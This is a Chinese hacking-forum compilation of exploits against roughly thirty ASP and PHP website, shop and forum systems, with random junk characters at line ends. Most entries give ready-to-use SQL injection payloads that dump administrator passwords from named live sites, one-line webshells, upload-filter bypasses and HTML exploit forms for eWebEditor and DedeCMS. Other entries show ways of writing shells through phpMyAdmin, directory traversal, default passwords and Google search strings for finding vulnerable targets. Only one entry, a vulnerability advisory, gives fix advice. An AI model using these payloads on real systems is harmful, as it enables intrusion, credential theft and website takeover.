启航企业建站系统 cookie注入漏洞通杀所有版本0 i4 K6 W% b+ @6 W0 N+ Q' ^
1 l0 x; K9 D* h5 V% c9 b R直接上exploit:
0 o' ?4 B, _( y: X B, D5 vjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));. H' F) J. ]& `+ @# W& ?$ U1 _' B9 ]
test:http://www.tb11.net/system/xitong/shownews.asp?id=210: A! s5 O: {6 `' X7 j& C
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 `; P2 x0 x+ p; V& m
Asprain论坛 注册用户 上传图片就可拿到webshell5 p$ K5 K+ i' w/ F" }9 f1 r. W
. d1 t6 v# S% i2 u9 ?5 O$ {
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
# i3 h3 @6 b) [1.txt存放你的一句话马 如:<%execute(request("cmd"))%>7 i1 P7 s( V, u% m7 @
2.gif 为一小图片文件,一定要小,比如qq表情图片8 I, Y. b9 }+ V; \
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用! J. x$ Z) U) }# g4 e
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了; H# S3 Y8 A) M! o4 C! `- h
5.q.asp;.gif
: d) n# Z. o4 tgoogle:Powered by Asprain
6 u( O: |9 w6 |1 A5 x--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 b g# s% ?: ~ p
# n: x( v7 m/ d: h
ShopNum1全部系统存在上传漏洞。
9 |0 z- Y, ]: G' u8 P5 d- a% L0 c: E. K' Q* Q! E
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。6 F' b# {1 Z4 i7 I2 j
按说明 提示登录后台。。
' G. S" C% ]+ _5 N( c在后台功能页面->附件管理->附件列表' Z" m/ R% D& h! v0 I
可以直接上传.aspx 后缀木马8 C0 D. X, x9 W) r. `$ l/ y
http://demo.shopnum1.com/upload/20110720083822500.aspx
2 K1 R1 E& T9 p, f; Z, a; x8 H--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. G- s4 {/ [# c5 } ?) R* @
p. b, I$ ~4 a3 W牛牛CMS中小企业网站管理系统 上传漏洞. a7 X1 L; D& N9 r; r w# Z! H
5 c" P' a6 p" v0 z" B% ]
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
% V& J3 C; c \3 P后台:admin/login.asp/ n& c9 B+ _6 i$ g" N% m0 y5 Q
ewebeditor 5.5 Nday
3 _! K H7 x+ j4 h. W- Jexp:# h I9 P% E- K
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
- O) x: V4 |# T! d! K7 C<input?type=file?name=uploadfile?size=100><br><br>?
4 I7 D4 H! [- I<input?type=submit?value=upload>?+ k) I; O% `, G x- z4 S
</form>, h# f. ?1 k# N% l% \
ps:先上传小马.
1 {: b4 N6 R: X- ?4 v3 Finurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏$ k m1 c9 a, ?* d" v6 p# B9 u, N+ j
) y6 Y; S! r8 |7 B0 s. z. ~' R8 c& j- Q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# d( x P% Z5 J6 \4 ^
7 M! y# [6 |0 B- Y' GYothCMS 遍历目录漏洞
1 `, F% Z/ n3 I* Z: w6 F. F' E1 k$ Z$ W9 p
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。- a9 n5 m/ q; i
默认后台:admin/login.asp y( q7 I& X- y
遍历目录:' n& G1 c, n* [) v, u
ewebeditor/manage/upload.asp?id=1&dir=../8 t6 A6 ?. M) ], x+ ]% m* R
data:7 h* Y! \" K; J1 {& I+ `
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
4 N( R {# \5 p% H--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- O" k$ ? g8 R( ]8 k& {
3 D( Z. F' p8 N6 VNet112企业建站系统 1.0" {7 c1 j9 k1 t/ m9 Q( U
+ p0 f. P0 p9 t
源码简介:* J7 N& u; c& e
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
! y$ ?, P3 y2 ]添加管理员:* l* y6 d* z& `5 z$ F J2 R
http://www.0855.tv/admin/admin.asp?action=add&level=2- h" d3 M2 V/ A- v2 s. j$ N
其实加不加都不是很重要,后台文件都没怎么作验证。8 G! J4 g) N6 d$ r8 m0 j3 Z4 Z
上传路径:& D. P; ?, }- _
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
! L3 `- ^, f U6 C7 b {5 Q) Jhttp://www.0855.tv/inc/Upfile.asp?Stype=2
2 g: a8 ]% K- j: C怎么利用自己研究。
( R% F! _6 {" e4 D" i7 q遍历目录:# y8 X1 l! S; Y# _
http://www.0855.tv/admin/upfile.asp?path=../..
% C# L; C2 D/ N如:8 J6 p$ d0 \9 H$ K
http://www.0855.tv/admin/upfile.asp?path=../admin# k: c5 O* k+ w# S6 z7 {4 x- f
http://www.0855.tv/admin/upfile.asp?path=../data
( E- t$ P9 Y9 s- q. |# `--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* ~/ Q5 ~7 l l; @3 T
" q& S4 t- H7 N) y7 A. V) H易和阳光购物商城通杀 上传漏洞
; u9 Y6 A2 {0 {' r
% O S( L' o8 K |; r& U前提要求是IIS6.0+asp坏境。; _1 ~7 I+ u! }# r" ~5 s, l
漏洞文件Iheeo_upfile.asp ( r' F! G- U2 f4 n" B+ l
过滤不严.直接可以iis6.0上传
6 j( M7 ~/ s1 k' R9 T) k, G6 r把ASP木马改成0855.asp;1.gif
) @2 ^) x$ D+ T1 d/ H( R$ `4 r' F$ l直接放到明小子上传
. {4 Q( R3 U# q9 J9 R, nGoogle搜索:inurl:product.asp?Iheeoid=
6 k. h( j- S6 q7 P% ~* \+ W; }' @--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ w5 e& b) i# [& ]5 s% C+ [' N
& ~5 u9 Y" {! D8 P6 _. wphpmyadmin后台4种拿shell方法
+ K$ R: B5 U+ S
4 E% q, B4 }2 m' }. u方法一:
: y6 V- V; L/ lCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );1 T: L/ T6 s6 Y" L# ~
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
- c% P( ?& e" zSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
2 A" S0 X8 f! w8 [0 u----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
# I( H/ \4 w+ s8 }& d& R一句话连接密码:xiaoma& c# n. ]1 S8 a& `
方法二:
- |: `+ \0 B- k' V& ?. LCreate TABLE xiaoma (xiaoma1 text NOT NULL);
5 X: j H! C) M# v* pInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');; E( l H& Q+ `8 c- Y+ t
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
0 D( C) t) g4 l# _+ IDrop TABLE IF EXISTS xiaoma;+ c; t9 f# @( E9 E" s( m" h
方法三:
1 E8 P0 t( F. Y* |+ H6 a读取文件内容: select load_file('E:/xamp/www/s.php');2 F# V7 `1 T. z, s
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'0 ]' [' E* {: L5 c
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
$ Y6 p/ l$ s7 g5 Q, p% _2 J* f方法四:# W! Q$ h: A- L1 c0 c
select load_file('E:/xamp/www/xiaoma.php');
# l) k* T: z8 R, Fselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
& q( j4 {+ f W( b然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
1 A* ?: X, j" Q) a5 ~9 O--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. M2 f) l# p- ~+ J' T. Q9 I
: t0 S* a- d% I+ J
传信网络独立开发网站源码0day漏洞& V6 [6 }; b" [( r# v( M
- q/ W8 Q. @+ n: w5 O0 _4 [+ {后台system/login.asp
( e# b3 U7 Q! C进了后台有个ewebeditor
/ s/ A: t% Z% RGoogle 搜索inurl:product1.asp?tyc=- w- a5 N$ o8 g2 b7 ?! C3 \ u" |
编辑器漏洞默认后台ubbcode/admin_login.asp. h, O" c/ L/ B% d) _& C* d
数据库ubbcode/db/ewebeditor.mdb* ]( c4 E3 E) ~* m- t. J
默认账号密码yzm 111111( ^; t! @1 F! U9 s1 v. X
9 b) ~2 [/ M5 v1 ?
拿webshell方法' k0 d) g% E# Z/ z! C, j5 n7 s
登陆后台点击“样式管理”-选择新增样式 4 L' {2 N9 x$ }2 }% `
样式名称:scriptkiddies 随便写 ( @! l: S. j2 E5 {% d$ H
路径模式:选择绝对路径
0 I$ f4 w/ W' D" |! k- j图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx6 y1 ~5 g# A+ v# \3 Y6 M
图片类型比如就是我们要上传的ASP木马格式
4 s0 _- e7 {3 l# v上传路径:/
& T4 }% n4 e: A$ w) C1 ?+ p. ~9 v图片限制:写上1000 免的上不了我们的asp木马: z% Y# Z% k/ {% d0 y
上传内容不要写
1 L/ D6 R1 Y+ @( r1 a7 B可以提交了 ; X4 `0 b9 R: y. i7 P# x
样式增加成功!
. z) B6 @8 F3 _. _+ |0 R: c+ w返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
7 K# U, F6 j, N) }" U6 l按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
8 Z/ C1 T9 j- ~* f网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
4 q* q! i5 `8 G& }' E上ASP木马 回车 等到路径
) K, e' f" w7 C- F- x
+ M( H3 G" x5 k( p' M后台:system/login.asp& a- p2 \# H2 s' ]
Exp:7 }4 A+ y0 r! n) _
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
( O+ o# A0 Z T1 W测试:
. B' B5 g% c8 p/ q4 d7 }8 whttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master% N4 ]7 D0 R- s3 D/ c2 u0 O
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
- s0 |) z0 ]6 Q' N--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# s) k0 m1 b8 p
2 G( D3 n3 U. h' ?# r/ L6 |5 G
foosun 0day 最新注入漏洞
9 W3 U, S/ I: ~4 Q; W; j6 ~, S+ K4 W; R7 }4 Z4 O
漏洞文件:www.xxx.com/user/SetNextOptions.asp% r2 r4 ]% P: {4 @& T
利用简单的方法:# c" j& ~0 ]$ U- Q
暴管理员帐号:
0 n( }3 H8 J/ S i( bhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
6 G$ Y6 q0 h) E& _8 ~7 V7 N* W& j1 D暴管理员密码:
+ m% t6 ^, l6 p. c8 T3 G. xhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,1 B1 E% u4 a; e3 ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- j: G: g$ p( K0 D; H' J
3 c9 D* v% ^# {; @: r6 D' M" B网站程序的版权未知!4 }: W; t6 Y; [ i
( s- ] y1 u% h默认网站数据库:! ?7 A! @+ n0 Q3 K, t% `
www.i0day.com/data/nxnews.mdb
! q( J& z0 p( j9 Uewebeditor 在线编辑器:
8 u/ {) u# R4 d4 @# _$ k8 @6 ^编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb* N2 ^3 Y! y! k( ]
登录地址:ewebeditor/admin_login.asp" F* J5 c4 d* P* |9 M
默认密码:admin admin' L5 {1 V7 N* b6 s
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
# S( X+ Q3 \. ^, j- ?- |+ W( p4 D( M
( B0 f) y8 U. bSql注入漏洞:5 F' c: |; i* S
http://www.i0day.com/detail.asp?id=12' H$ F$ T' Q! F7 N4 @5 e
exp:$ n: w; [7 o7 A$ I5 V
union select 1,admin,password,4,5,6,7,8 from admin5 g7 e$ O1 ], i3 Q
爆出明文帐号/密码# u. z( m- s! r( h2 a% g }, F: ]
, x" @6 ^5 f6 l ]& X2 d上传漏洞:, X: ]# V: h9 {8 B
后台+upfile.asp( \3 v% H H1 ?% J7 P+ |0 Q
如:
# Z* c1 A' ] @http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。9 s; f, J( T2 N. M, L1 y$ K
shell的地址:网址+后台+成功上传的马
1 N2 \0 R" M7 fgoogle:inurl:news.asp?lanmuName=
: W$ |8 ?" K% X. f------------------------------------------------------------------------------------------------------------------------------------------------------------------------' P5 R+ A/ t$ T
8 j+ t: y$ R0 d# Z* Gdedecms最新0day利用不进后台直接拿WEBSHELL$ H) r- Y) |/ K# @/ |' s
; @% k1 M3 E3 M; R3 x8 C. e
拿webshell的方法如下:8 n7 F0 C$ i0 [8 j8 N
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.0 B" t0 c, A: ]0 i5 r! E
前题条件,必须准备好自己的dede数据库,然后插入数据:
1 K; R7 m0 Y- Binsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
7 L3 v$ F% Y/ I8 N& s* M' f6 k1 B) s, G7 f
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
" q; h6 U. r% R" v: X, ]# c' H$ l6 p+ f<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">+ K& x& r: L, L. E3 \5 r
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
) X2 k/ F0 H, p9 X _7 P5 S$ g3 g& I<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />+ ~7 [: b b8 D5 \+ H" D
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />& t u: O5 |6 w% v8 o* p7 z
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
9 B8 F# b+ e5 v: g$ \& p<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
$ ^# I6 q6 g% B; B1 z% o5 B<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />+ J. t0 s }3 C* R
<input type="text" value="true" name="nocache" style="width:400">- F- k0 U7 a0 |2 j
<input type="submit" value="提交" name="QuickSearchBtn"><br />
4 @8 I+ a% M; X& }1 B' k- ]</form>
3 h3 @7 y' {. z<script>
) M) o* V. B& S& Mfunction addaction()
, R7 ]& V7 f# O5 a& }9 D, o* V{
/ c# L, M+ G, Gdocument.QuickSearch.action=document.QuickSearch.doaction.value;7 c" _* X4 v) {' W
}
O: A* y9 r1 Q) q6 Y) E1 J</script>3 q; M) a4 [) p; d4 x$ u* d3 {
-----------------------------------------------------------------------------------------------------------------------------------------------( n! P3 @: j' R) x) X' W
3 l- t' @! e' C) N! T7 bdedecms织梦暴最新严重0day漏洞, C/ D9 m+ Y) ^
bug被利用步骤如下:
# U* d+ N! l/ \+ J7 g- v/ C5 o# fhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
" X+ ?9 u. l* ]) w5 V3 h把上面{}上的字母改为当前的验证码,即可直接进入网站后台。: v0 `$ q4 s5 V0 Q$ v! K5 K- s: `
-------------------------------------------------------------------------------------------------------------------------------------------1 i9 n/ k- n, V7 S
& R! p+ |0 p1 m/ X. a m6 Y多多淘宝客程序上传漏洞 1 E2 b1 @8 B0 X5 G3 @- X& [
漏洞页面:
4 v! P' E# a; ~admin\upload_pic.php
' P; u! |+ V' p, u. O: ], `传送门:/ Z! X7 K2 f9 m& b$ w
http://www.www.com/admin/upload_pic.php?uploadtext=slide12 C3 O( S% g$ \% ]8 e" O
PS:copy张图片马 直接 xxx.php 上传抓包地址!
9 _) f8 C% d: V+ f/ G( u5 w. d6 m' M------------------------------------------------------------------------------------------------------------------------------------------------------
1 J$ ^0 `6 I* D# @4 o5 ~; w# @6 A& ^5 C% Q" P# _2 \
无忧公司系统ASP专业版后台上传漏洞. I4 M0 b) l- E5 g+ L3 z, X
漏洞文件 后台上传( G, a) ?5 q5 P, j" T N+ N" Q) X
admin/uploadPic.asp
% ]0 K+ v* N' N9 K漏洞利用 这个漏洞好像是雷池的7 t6 O, H2 q7 @* V
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1. K9 i7 V7 `) n
等到的webshell路径:# H: Y! s! @& P9 h
/UploadFiles/scriptkiddies.asp;_2.gif
' C: s4 F$ K2 s; g5 p. `---------------------------------------------------------------------------------------------------------------------------------------------------+ V* y6 }% N4 E$ M- p6 t
/ P+ J% I" R8 v% Q住哪酒店分销联盟系统2010. n) u) ~ B4 g7 }- H
Search:
' K" g% P6 X6 x! S* zinurl:index.php?m=hotelinfo0 t9 a5 f) b$ t
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin" e/ D; b) h0 j+ C4 n
默认后台:index.php?m=admin/login
$ \) i- ^1 N6 |) J) E--------------------------------------------------------------------------------------------------------------------------------------------------
9 v, z$ m8 H0 M" A& Y7 s1 X
( i3 o" g( A" ?9 Pinurl:info_Print.asp?ArticleID=
2 j- G% I4 _, d. C4 q9 R$ W后台 ad_login.asp1 \5 F" C7 e" f* o0 I0 e
爆管理员密码:
7 F% `5 z/ L( A! Nunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
* r; Q9 W% c7 ^& @; Z) P------------------------------------------------------------------------------------------------------------------------------------------------------------
$ d3 l- y) i2 o7 m! K: }
& l. w2 E" M7 l! A# Q% T( G. e. p搜索框漏洞!
{9 l* y6 N7 S2 m, n%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
! l1 m9 F: A0 z. L7 w* t7 S1 L- y--------------------------------------------------------------------------------------------------------------------------------------------------------% m4 e3 c9 [0 O5 T/ ~) e/ V8 r
+ L6 i: Y/ X7 |4 X6 W关键字:
8 C7 h! K: Y( ]. Y9 P4 P: Xinurl:/reg_TemletSel.asp?step=23 d0 a& E8 K/ T8 l
或者! Q) d5 A \+ i+ M) L0 Y/ ?, o
电子商务自助建站--您理想的助手
) w9 D. s5 e$ o6 @, H; c( |/ z2 ~/ p-------------------------------------------------------------------------------------------------------------------------------------------------
. N' P. I/ a3 m* u7 k1 W( Y. b( t3 J9 p4 R) W: J9 u+ o) p
iGiveTest 2.1.0注入漏洞
4 w) Y# t, v( \) y5 I6 oVersion: <= 2.1.0
7 }' i6 E" o: f# Homepage: http://iGiveTest.com/
7 n4 K$ [) l" X3 u& }# r谷歌关键字: “Powered by iGiveTest”
" `5 m+ m) _7 m8 [3 X9 x3 ~9 B随便注册一个帐号。然后暴管理员帐号和密码
, _# o, l$ v/ W% f7 y# H! ^2 Khttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1! ?' ~- ?8 A) N* a0 I1 V. h
------------------------------------------------------------------------------------------------------------------------------------------------
" m' {7 V7 j0 D
5 h2 {: N% @! L( TCKXP网上书店注入漏洞
4 v, B4 j8 J% Z工具加表:shop_admin 加字段:admin5 A8 |: H4 ~# E5 \" v
后台:admin/login.asp
! L0 _" H. g& I, F; |9 a登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
% k* v; v1 m2 z* l7 Xinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
+ V. W5 Q$ Z! l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 ?- C# Y6 q2 X8 z b: k
9 m7 V+ v9 L, v$ ~段富超个人网站系统留言本写马漏洞- {1 A6 U9 H& X2 l+ h+ {
源码下载:http://www.mycodes.net/24/2149.htm
* d8 o: ~( h+ E1 O) oaddgbook.asp 提交一句话。' s t0 D$ C& W8 e1 O
连接: http://www.xxxx.tv/date/date3f.asp
: [ V2 K1 M" S1 {( dgoogle:为防批量,特略!
I. J+ G, r0 f4 S-------------------------------------------------------------------------------------------------------------------------------------------------------------------------. w2 {2 `7 ~% o9 P
& `( B& A6 a9 u智有道专业旅游系统v1.0 注入及列目录漏洞
' d$ \3 T5 w9 Y- ^9 i" |默认后台路径:/admin/login.asp
r2 y. E! p! a7 t# C" p默认管理员:admin! Y0 V. J3 i- n
默认密码:123456: L# |3 w7 q% x* I; W
SQL EXP Tset:
4 s' U2 v0 `! Y9 o! }2 ehttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin; p$ }6 I; h6 R: _) r* @; H
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& s* w j/ i4 s8 i* G$ j% W$ r, Z' u" o6 [
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
! ?6 |# Y: x! r% m1 g+ `0 SEXP:: b( Y* K" M6 y1 u1 J8 W$ N3 x e
<title>eWebeditoR3.8 for php任意文件上EXP</title>
$ {) S2 \/ w: W2 ^1 v- d, @2 ?<form action="" method=post enctype="multip
. d. z: v0 t" }8 s' m1 Y' N6 Tart/form-data">
7 O# A- Z$ a) C' Q<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
, U' z/ O+ m: A/ m& \' ?2 {, yURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
& i7 ]+ B* g- l<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
. b) F Z7 K8 c8 k9 L( y5 xfile:<input type=file name="uploadfile"><br>
7 u2 j4 q2 w! h3 @<input type=button value=submit onclick=fsubmit()> # ^: Q: A* K% r: v$ U0 W7 I1 R
</form><br>
8 @ u& z) F" i<script>
5 F/ X( F/ w; X$ E3 M& ifunction fsubmit(){
/ o0 z2 V! P: f" S a8 r2 J. nform = document.forms[0];
% X0 n' u- ]: d, Q& v; c# g# x. Z- _form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; ; r& R6 X; p7 I( P1 g' @4 H
alert(form.action);
; @* o" a) u9 f/ r: `8 Oform.submit(); 4 t- Y3 c5 {/ j+ `; d) d" ~
} % I1 ^7 e% B+ D; B
</script>6 y" Z& Y, U' W) b. q
注意修改里面ewebeditor的名称还有路径。
) f2 F: c0 J# j0 ?7 c& \---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- b, ]% l+ g' e9 `' r$ ]5 V
% ~" W$ |3 q7 d; q/ p2 P5 v提交’时提示ip被记录 防注入系统的利用' r/ A) A: v9 o- C+ _: C# z" D
网址:http://www.xxx.com/newslist.asp?id=122′
, m$ L0 E' L* n6 M) R( l8 r+ g+ P提示“你的操作已被记录!”等信息。
5 }( A# v- c0 B1 X; Q7 x利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。- |& j$ D5 P( H' J5 z
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) B5 I1 w3 U8 a8 x$ a& {' \) i& H8 ~8 T
西部商务网站管理系统 批量拿shell-0day; o) @: w. X" v4 q7 N) M5 f2 E$ e
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ( \ X; V3 _0 d0 F2 |
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛2 q _4 f2 J/ m! @8 V( n
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
4 w5 T0 Y% X' n" ~) `3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂" ^3 x$ q; e6 N' Y4 K
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& h* U, i; C5 R2 R
6 Y; a" L" _$ R- F* gJspRun!6.0 论坛管理后台注入漏洞
5 U. A5 ?. q) u" h
9 k: N4 A. p- V* ^% d: y# ?SEBUG-ID:20787 发布时间:2011-04-30 影响版本:: J0 B; F7 n4 `& U0 j! }4 v
JspRun!6.0
6 k! x" p/ }3 d @% z漏洞描述:
) A' ~7 f- e% c: b* pJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
2 m3 a! E2 ~+ c' e在处理后台提交的文件中ForumManageAction.java第1940行
( Z+ ~$ h) ^( y& [5 e* y8 r% |String export = request.getParameter("export");//直接获取,没有安全过滤! b: C0 d' v& |& n
if(export!=null){
: c% P/ i% e/ ? I0 Y3 GList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...4 B7 ~' D% d' i( m
if(styles==null||styles.size()==0){0 i5 i2 H: ?1 z+ E7 N, @
<*参考! `! I! [+ J N- X$ N# O
nuanfan@gmail.com
1 R2 C' Q! z% y$ o; V+ J; Y1 c9 f( {*> SEBUG安全建议:' S8 O3 C) p o% _" Q2 j2 K
www.jsprun.net1 O9 N8 E) ]# B# P5 B; [9 M
(1)安全过滤变量export; q, w! m2 c- G, Y! w
(2)在查询语句中使用占位符
$ K( B/ k1 l m7 ~5 ~+ w( }4 {------------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 F6 g- M7 J; P, Z7 T% G% b
, G0 @3 \$ A# ^' T: a乌邦图企业网站系统 cookies 注入
5 `$ D- g: q$ O8 D8 \
2 A- L3 L: [+ k/ |; W. `程序完整登陆后台:/admin/login.asp3 Z0 f9 K5 M" G) t4 Z0 P6 Q @3 z
默认登陆帐号:admin 密码:admin888
$ V0 z1 q0 |& `语句:(前面加个空格)
1 W0 }9 }7 C [" tand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin6 B2 ?( e- {5 s: u) m
或者是16个字段:
. f* L* |/ c2 [and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin' m' Q: p* {- N# A4 X( C$ n
爆不出来自己猜字段。8 }' a+ x/ Q% J: a
注入点:http://www.untnt.com/shownews.asp?=886 N1 Y; L/ C ?( m6 ?* s
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
6 e; c9 {4 u1 A关键字:
' \/ B3 p$ \+ l8 E; {3 ninurl:shownews?asp.id=; U/ n4 g$ B1 x5 C% e
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; S+ I% Q: W( Q9 C7 P6 n- Q# R* C! a: }6 K7 A P
CKXP网上书店注入漏洞
9 ]# X9 z X; l8 h+ N: F9 \# q: A7 Z; k
工具加表:shop_admin 加字段:admin) A0 K. z' E( z2 y1 h) R4 ?
后台:admin/login.asp
H/ E! n& W; }2 q$ E1 I0 L9 D1 }登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/' @$ b/ E5 q" `: n5 P- @
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息2 V V4 \5 _& q ^2 @1 k! t
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------! Q5 D: o8 e/ z) A' d
& @$ q9 k5 Y) s1 E% G% L nYxShop易想购物商城4.7.1版本任意文件上传漏洞
w9 u/ y" r0 g4 a4 E8 G8 _* u: d% I7 y Q- }
http://xxoo.com/controls/fckedit ... aspx/connector.aspx. V3 n4 U8 Q5 n& O* r+ [1 F; {
跳转到网站根目录上传任意文件。
' @% A1 S, y, X; ?6 Q8 |9 A如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件5 M% ]1 h8 @; I0 D9 d5 U
